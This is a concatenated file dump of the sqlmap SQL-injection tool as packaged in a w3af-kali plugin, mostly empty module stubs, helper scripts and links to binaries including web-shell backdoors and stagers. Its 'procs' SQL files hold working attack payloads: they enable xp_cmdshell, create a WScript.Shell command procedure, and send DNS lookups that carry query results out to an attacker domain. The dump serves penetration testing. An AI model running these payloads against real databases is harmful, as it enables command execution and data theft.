6 |
7 | You can contact both developers by writing to dev@sqlmap.org
8 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/doc/FAQ.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/doc/FAQ.pdf
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/doc/README.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/doc/README.pdf
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/beep/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/beep/beep.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/extra/beep/beep.wav
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/cloak/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/dbgtool/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/icmpsh/icmpsh.exe_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/extra/icmpsh/icmpsh.exe_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/runcmd/README.txt:
--------------------------------------------------------------------------------
1 | Files in this folder can be used to compile auxiliary program that can
2 | be used for running command prompt commands skipping standard "cmd /c" way.
3 | They are licensed under the terms of the GNU Lesser General Public License.
4 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/runcmd/windows/README.txt:
--------------------------------------------------------------------------------
1 | Compile only the Release version because the Runtime library option
2 | (Project Properties -> Configuration Properties -> C/C++ -> Code
3 | Generation) is set to "Multi-threaded (/MT)", which statically links
4 | everything into executable and doesn't compile Debug version at all.
5 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/runcmd/windows/runcmd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // runcmd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/safe2bin/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/README.txt:
--------------------------------------------------------------------------------
1 | Binary files in this folder are data files used by sqlmap on the target
2 | system, but not executed on the system running sqlmap. They are licensed
3 | under the terms of the GNU Lesser General Public License and their source
4 | code is available on https://github.com/inquisb/shellcodeexec.
5 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/linux/shellcodeexec.x32_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/linux/shellcodeexec.x32_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/linux/shellcodeexec.x64_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/linux/shellcodeexec.x64_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/windows/shellcodeexec.x32.exe_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/shutils/blanks.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
4 | # See the file 'doc/COPYING' for copying permission
5 |
6 | # Removes trailing spaces from blank lines inside project files
7 | find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;
8 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/shutils/pep8.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
4 | # See the file 'doc/COPYING' for copying permission
5 |
6 | # Runs pep8 on all python files (prerequisite: apt-get install pep8)
7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;
8 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/shutils/pyflakes.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
4 | # See the file 'doc/COPYING' for copying permission
5 |
6 | # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \;
8 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/extra/sqlharvest/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/controller/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/core/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/parse/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/request/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/request/methodrequest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | import urllib2
9 |
10 | class MethodRequest(urllib2.Request):
11 | """
12 | Used to create HEAD/PUT/DELETE/... requests with urllib2
13 | """
14 |
15 | def set_method(self, method):
16 | self.method = method.upper()
17 |
18 | def get_method(self):
19 | return getattr(self, 'method', urllib2.Request.get_method(self))
20 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/takeover/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/techniques/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/techniques/blind/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/techniques/brute/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/techniques/dns/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/techniques/error/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/techniques/union/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/lib/utils/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/plugins/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/plugins/dbms/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/plugins/dbms/db2/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | def __init__(self):
12 | GenericFilesystem.__init__(self)
13 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/plugins/dbms/db2/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | from plugins.generic.takeover import Takeover as GenericTakeover
9 |
10 | class Takeover(GenericTakeover):
11 | def __init__(self):
12 | self.__basedir = None
13 | self.__datadir = None
14 |
15 | GenericTakeover.__init__(self)
16 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/plugins/dbms/mysql/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
9 |
10 | class Enumeration(GenericEnumeration):
11 | def __init__(self):
12 | GenericEnumeration.__init__(self)
13 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/plugins/generic/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/README.txt:
--------------------------------------------------------------------------------
1 | Files in this folder represent SQL snippets used by sqlmap on the target
2 | system.
3 | They are licensed under the terms of the GNU Lesser General Public License
4 | where not specified otherwise.
5 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mssqlserver/activate_sp_oacreate.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_configure 'show advanced options',1;
2 | RECONFIGURE WITH OVERRIDE;
3 | EXEC master..sp_configure 'ole automation procedures',1;
4 | RECONFIGURE WITH OVERRIDE
5 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mssqlserver/configure_openrowset.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_configure 'show advanced options', 1;
2 | RECONFIGURE WITH OVERRIDE;
3 | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
4 | RECONFIGURE WITH OVERRIDE;
5 | EXEC sp_configure 'show advanced options', 0;
6 | RECONFIGURE WITH OVERRIDE
7 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mssqlserver/configure_xp_cmdshell.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_configure 'show advanced options',1;
2 | RECONFIGURE WITH OVERRIDE;
3 | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
4 | RECONFIGURE WITH OVERRIDE;
5 | EXEC sp_configure 'show advanced options',0;
6 | RECONFIGURE WITH OVERRIDE
7 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mssqlserver/create_new_xp_cmdshell.sql:
--------------------------------------------------------------------------------
1 | DECLARE @%RANDSTR% nvarchar(999);
2 | set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
3 | EXEC master..sp_executesql @%RANDSTR%
4 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mssqlserver/disable_xp_cmdshell_2000.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_dropextendedproc 'xp_cmdshell'
2 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mssqlserver/dns_request.sql:
--------------------------------------------------------------------------------
1 | DECLARE @host varchar(1024);
2 | SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
3 | EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
4 | # or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
5 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mssqlserver/enable_xp_cmdshell_2000.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'
2 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mssqlserver/run_statement_as_user.sql:
--------------------------------------------------------------------------------
1 | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
2 | # SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
3 | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
4 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mysql/dns_request.sql:
--------------------------------------------------------------------------------
1 | SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%'))
2 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/mysql/write_file_limit.sql:
--------------------------------------------------------------------------------
1 | LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%--
2 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/oracle/dns_request.sql:
--------------------------------------------------------------------------------
1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
2 | # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
3 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/procs/postgresql/dns_request.sql:
--------------------------------------------------------------------------------
1 | DROP TABLE IF EXISTS %RANDSTR1%;
2 | CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
3 | CREATE OR REPLACE FUNCTION %RANDSTR3%()
4 | RETURNS VOID AS $$
5 | DECLARE %RANDSTR4% TEXT;
6 | DECLARE %RANDSTR5% TEXT;
7 | BEGIN
8 | SELECT INTO %RANDSTR5% (%QUERY%);
9 | %RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
10 | EXECUTE %RANDSTR4%;
11 | END;
12 | $$ LANGUAGE plpgsql SECURITY DEFINER;
13 | SELECT %RANDSTR3%();
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/backdoor.asp_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/backdoor.asp_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/backdoor.aspx_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/backdoor.aspx_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/backdoor.jsp_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/backdoor.jsp_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/backdoor.php_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/backdoor.php_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/runcmd.exe_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/runcmd.exe_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/stager.asp_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/stager.asp_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/stager.aspx_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/stager.aspx_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/stager.jsp_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/stager.jsp_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/shell/stager.php_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/shell/stager.php_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/tamper/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/thirdparty/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/ansistrm/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/thirdparty/ansistrm/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/bottle/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
5 | See the file 'doc/COPYING' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/colorama/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/thirdparty/colorama/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/magic/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/thirdparty/magic/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/multipart/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/thirdparty/multipart/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/oset/__init__.py:
--------------------------------------------------------------------------------
1 | """Main Ordered Set module """
2 |
3 | from pyoset import oset
4 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/socks/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/thirdparty/socks/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/thirdparty/termcolor/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/thirdparty/termcolor/__init__.py
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/txt/wordlist.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/txt/wordlist.zip
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/README.txt:
--------------------------------------------------------------------------------
1 | Binary files in this folder are data files used by sqlmap on the target
2 | system, but not executed on the system running sqlmap. They are licensed
3 | under the terms of the GNU Lesser General Public License and their source
4 | code is available on https://github.com/sqlmapproject/udfhack.
5 |
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/mysql/linux/32/lib_mysqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/mysql/linux/32/lib_mysqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/mysql/windows/32/lib_mysqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/mysql/windows/32/lib_mysqludf_sys.dll_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/andresriancho/w3af-kali/5a8581b068dd7a0bc38bbcbee2ee41e2d2831fd6/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
